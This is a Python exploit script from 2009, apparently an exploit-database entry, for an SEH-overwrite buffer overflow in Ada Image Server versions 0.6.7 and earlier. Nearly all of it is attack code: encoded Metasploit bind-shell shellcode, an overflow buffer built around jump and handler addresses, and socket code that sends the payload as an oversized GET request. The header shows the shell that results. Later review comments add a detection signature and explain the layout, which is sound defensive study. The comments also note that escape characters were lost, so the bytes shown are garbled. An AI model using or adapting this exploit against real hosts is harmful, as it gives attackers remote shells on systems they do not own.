
# Title : Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
# Published : 2009-10-07
# Author : Blake


#!/usr/bin/python
# Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe.
# However, it contains a null character in the address (ex: XP SP3 => 00689aff).
# Versions above 0.6.7 do not seem to be vulnerable.
# 
# $ ./imgsrv.py 192.168.1.146
#
# [*] Ada Image Server v0.6.6 SEH Overwrite
# [*] Discovered/Exploited by Blake
# [*] Tested on XP SP1
#
# [+] Connecting to 192.168.1.146
# [+] Sending payload
# [+] Payload Sent
#
# $ nc 192.168.1.146 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Imgsvr>

import socket, sys

# Banner.  NOTE(review): the string literals in this listing appear to have
# lost their backslash escape characters during extraction (the stray "n" at
# the ends of these lines was presumably a newline escape); the same applies
# to the buffers below, so the bytes shown are indicative rather than exact.
print "n[*] Ada Image Server v0.6.6 SEH Overwrite"
print "[*] Discovered/Exploited by Blake"
print "[*] Tested on XP SP1n"

# Exactly one argument (the target host) is required; anything else prints
# usage and exits.  NOTE(review): the exit status is 0 on a usage error, so a
# calling script cannot tell this apart from a normal run.
if len(sys.argv)!= 2:
	print "[*] Usage: %s <ip>n" % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]
port = 1235		# default port of the image server; hard-coded, no CLI override

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
#
# Metasploit-generated bind shell; per the header above and the nc session in
# the file header it listens on TCP 4444 once it runs.  The alpha_mixed
# encoding is why, after the first few bytes, the buffer consists almost
# entirely of printable 0x30-0x39 / 0x41-0x5a values.  Detection note: a GET
# request line of roughly 20 KB made of one repeated byte followed by a long
# run of printable-alphanumeric bytes is a strong, low-false-positive
# signature for this traffic; the mitigation per the file header is to run a
# release newer than 0.6.7.
shellcode = (
"x89xe1xdaxd5xd9x71xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b"
"x51x55x47x4cx4cx4bx43x4cx44x45x42x58x45x51x4a"
"x4fx4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x43x31"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4dx54x49x50x43x44x44x47"
"x49x51x48x4ax44x4dx43x31x48x42x4ax4bx4cx34x47"
"x4bx51x44x47x54x47x58x44x35x4ax45x4cx4bx51x4f"
"x51x34x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx46x44x45x4cx45x31x48x43x50x31x49"
"x4bx43x54x4cx4bx50x43x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x45x36x50x53x43x56x43x58x46x53x46x52x45"
"x38x42x57x43x43x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4cx49x4dx35x45x36x4bx31x4ax4dx44x48"
"x43x32x50x55x42x4ax43x32x4bx4fx4ex30x45x38x48"
"x59x43x39x4ax55x4ex4dx46x37x4bx4fx4ex36x51x43"
"x51x43x51x43x51x43x51x43x51x53x51x43x50x43x50"
"x53x4bx4fx48x50x45x36x43x58x42x31x51x4cx45x36"
"x51x43x4dx59x4dx31x4ax35x43x58x4ex44x45x4ax44"
"x30x48x47x46x37x4bx4fx49x46x42x4ax42x30x46x31"
"x50x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4d"
"x39x46x37x4bx4fx4ex36x46x33x50x55x4bx4fx48x50"
"x43x58x4bx55x50x49x4cx46x50x49x46x37x4bx4fx4e"
"x36x50x50x51x44x50x54x50x55x4bx4fx48x50x4ax33"
"x42x48x4bx57x44x39x48x46x44x39x51x47x4bx4fx49"
"x46x46x35x4bx4fx48x50x45x36x42x4ax43x54x43x56"
"x42x48x42x43x42x4dx4bx39x4bx55x42x4ax50x50x50"
"x59x51x39x48x4cx4cx49x4ax47x43x5ax47x34x4bx39"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex47x32x46"
"x4dx4bx4ex47x32x46x4cx4dx43x4cx4dx42x5ax50x38"
"x4ex4bx4ex4bx4ex4bx45x38x43x42x4bx4ex4ex53x44"
"x56x4bx4fx42x55x47x34x4bx4fx4ex36x51x4bx50x57"
"x51x42x50x51x50x51x50x51x42x4ax45x51x50x51x50"
"x51x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx4ex39"
"x44x45x48x4ex46x33x4bx4fx49x46x43x5ax4bx4fx4b"
"x4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4cx4bx33"
"x49x54x42x44x4bx4fx49x46x50x52x4bx4fx48x50x43"
"x58x4cx30x4cx4ax43x34x51x4fx51x43x4bx4fx48x56"
"x4bx4fx4ex30x41x41")


# Buffer layout, in send order (sizes taken from the multipliers below):
#   payload   19000  filler
#   nops         29  nop sled
#   sc          696  the shellcode above
#   near_jmp      5
#   next_seh      4
#   ----------------  = 19734, which matches the SEH-handler offset the
#                     author states in the original comment
#   seh           4  handler address
#   junk        262  trailing filler
payload = "x41" * 19000			# filler up to the SEH record (author: handler at 19734)
nops = "x90" * 29				# nop sled in front of the shellcode
sc = shellcode					# shellcode - 696 bytes
near_jmp = "xe9x44xfdxffxff"		# near jmp back over nops+sc (author: -700 bytes; e9 44 fd ff ff is disp -700)
next_seh = "xebxf9xffxff"			# short jmp back onto near_jmp (author: -7 bytes; eb f9 is disp -7)
seh = "x10xbfxc1x77"			# handler address inside msvcrt.dll on the tested XP build.
								# NOTE(review): the file header says only imgsrv.exe lacks
								# SafeSEH on SP2/SP3, so this msvcrt.dll address is
								# presumably specific to the SP1 target named in the banner.
junk = "x43" * 262				# trailing filler after the SEH record


print "[+] Connecting to %s" % host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,port))
except:
	# NOTE(review): a bare except also swallows KeyboardInterrupt and
	# SystemExit, the socket is not closed on this path, and the process
	# exits with status 0 despite the failure.
	print "[x] Could not connect!n"
	sys.exit(0)	

# One GET whose request-line "path" is the whole buffer; nothing is read back
# before the socket is closed.  NOTE(review): socket.send may return after a
# partial write and its return value is not checked.
print "[+] Sending payload"
s.send("GET /" + payload + nops + sc + near_jmp + next_seh + seh + junk + " HTTP/1.0rnrn")
s.close()
print "[+] Payload Sentn"